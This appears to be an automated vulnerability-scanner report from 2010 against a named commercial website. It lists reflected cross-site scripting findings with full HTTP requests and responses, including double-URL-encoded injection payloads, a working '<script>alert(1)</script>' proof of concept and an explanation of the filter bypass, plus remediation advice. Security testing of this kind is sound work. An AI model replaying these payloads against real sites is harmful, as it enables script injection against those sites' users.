GET /blog/webanalytics.feed?d0c5b%2522%253e%253ca%253e596218aef01=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:30:42 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:30:46 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:30:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18400
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 933e0%2522%253e%253ca%253e350a4cb8d86 was submitted in the REST URL parameter 4. This input was echoed as 933e0\"><a>350a4cb8d86 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /component/jsetup/comment/add.html933e0%2522%253e%253ca%253e350a4cb8d86 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 00:51:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 00:51:53 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 00:51:53 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25917
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.16. http://www.analyticspros.com/component/jsetup/comment/add.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/component/jsetup/comment/add.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 101c5%2522%253e%253ca%253eeafa5c77b48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 101c5\"><a>eafa5c77b48 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /component/jsetup/comment/add.html?101c5%2522%253e%253ca%253eeafa5c77b48=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 00:48:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 00:48:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 00:48:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the titleheader request parameter is copied into the HTML document as plain text between tags. The payload a96b6<a>841ff0d01db was submitted in the titleheader parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /component/jsetup/comment/add.html?commenttype=20&etid=95&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTk1Om1vcmUtZGltZW5zaW9ucy1zaXRlLXNlYXJjaC1zb3VyY2UtbWVkaXVtJnZpZXc9YXJ0aWNsZSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA%3D%3D&titleheader=a96b6<a>841ff0d01db HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=95&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTk1Om1vcmUtZGltZW5zaW9ucy1zaXRlLXNlYXJjaC1zb3VyY2UtbWVkaXVtJnZpZXc9YXJ0aWNsZSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:11:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:11:24 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:11:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27962
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the format request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a708%2522%253e%253ca%253e7b78511ca8a was submitted in the format parameter. This input was echoed as 7a708\"><a>7b78511ca8a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the format request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html7a708%2522%253e%253ca%253e7b78511ca8a&titleheader=[ New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:36:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 05:36:30 GMT Connection: close Content-Type: text/html; charset=utf-8
2.19. http://www.analyticspros.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30a55%2522%253e%253ca%253e82f968d4169 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30a55\"><a>82f968d4169 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA=&titleheader=[&format=/30a55%2522%253e%253ca%253e82f968d4169html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D&titleheader=%5B Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:04:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 06:04:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 7160
2.20. http://www.analyticspros.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.analyticspros.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb60"><script>alert(1)</script>928b19da212 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7eb60\"><script>alert(1)</script>928b19da212 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA=&titleheader=[&format=html&7eb60"><script>alert(1)</script>928b19da212=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/component/jsetup/comment/add.html?commenttype=20&etid=100&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTc1JmZvcm1hdD1odG1sJmlkPTEwMDpnb29nbGUtYW5hbHl0aWNzLXRyYWluaW5nLXRvcm9udG8tZW1ldHJpY3MtMjAxMCZ2aWV3PWFydGljbGUmbGF5b3V0PWRlZmF1bHQmY29tbWVudHR5cGU9MjA%3D&titleheader=%5B Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:03:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:03:27 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:03:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the titleheader request parameter is copied into the HTML document as plain text between tags. The payload f609c<a>d1bae9fc71a was submitted in the titleheader parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /index.php?option=com_jsetup&controller=comment&task=add&commenttype=20&etid=51&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fY29udGVudCZlaWQ9QXJyYXkmSXRlbWlkPTY0JmZvcm1hdD1odG1sJnZpZXc9YXJ0aWNsZSZpZD01MSZsYXlvdXQ9ZGVmYXVsdCZjb21tZW50dHlwZT0yMA==&format=html&titleheader=[f609c<a>d1bae9fc71a New ] HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:38:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:38:48 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:38:48 GMT Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.22. http://www.analyticspros.com/products.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/products.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ecde%2522%253e%253ca%253eb941a4c1b27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ecde\\\"><a>b941a4c1b27 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
2.23. http://www.analyticspros.com/products/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c766%2522%253e%253ca%253e0da9362e199 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c766\\\"><a>0da9362e199 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /products/?8c766%2522%253e%253ca%253e0da9362e199=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:44:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:44:52 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:44:52 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.
< ...[SNIP]... <!-- var prefix = 'mailto:'; var suffix = ''; var attribs = ''; var path = 'hr' + 'ef' + '='; var addy97625 = 'caleb' + '@'; addy97625 = addy97625 + 'analyticspros' + '.' + 'com'; var addy_text97625 = 'send me an email'; document.write( '<a ' + path + '\'' + prefix + addy97625 + suffix + '\'' + attribs + '>' ); document.write( addy_text97625 ); document.write( '<\/a>' ); //--> </script> <script language='JavaScript' type='text/javascript'> <!-- document.write( '<span style=\'display: none;\'>' ); //--> </script>This e-mail address is being protected from spambots. You need JavaScript enabled to view it <script language='JavaScript' type='text/javascript'> <!-- document.write( '</' ); document.write( 'span>' ); //--> </script> or use the box at-left.</p> <p>The results: here's an example chart from the spreadsheet!</p> <p><a class="jcepopup" target="_blank" title="unique_keywords_example" href="/images/stories/blogimg/unique_keywords_example.png"><img style="border: thin solid #000000; margin: 5px;" 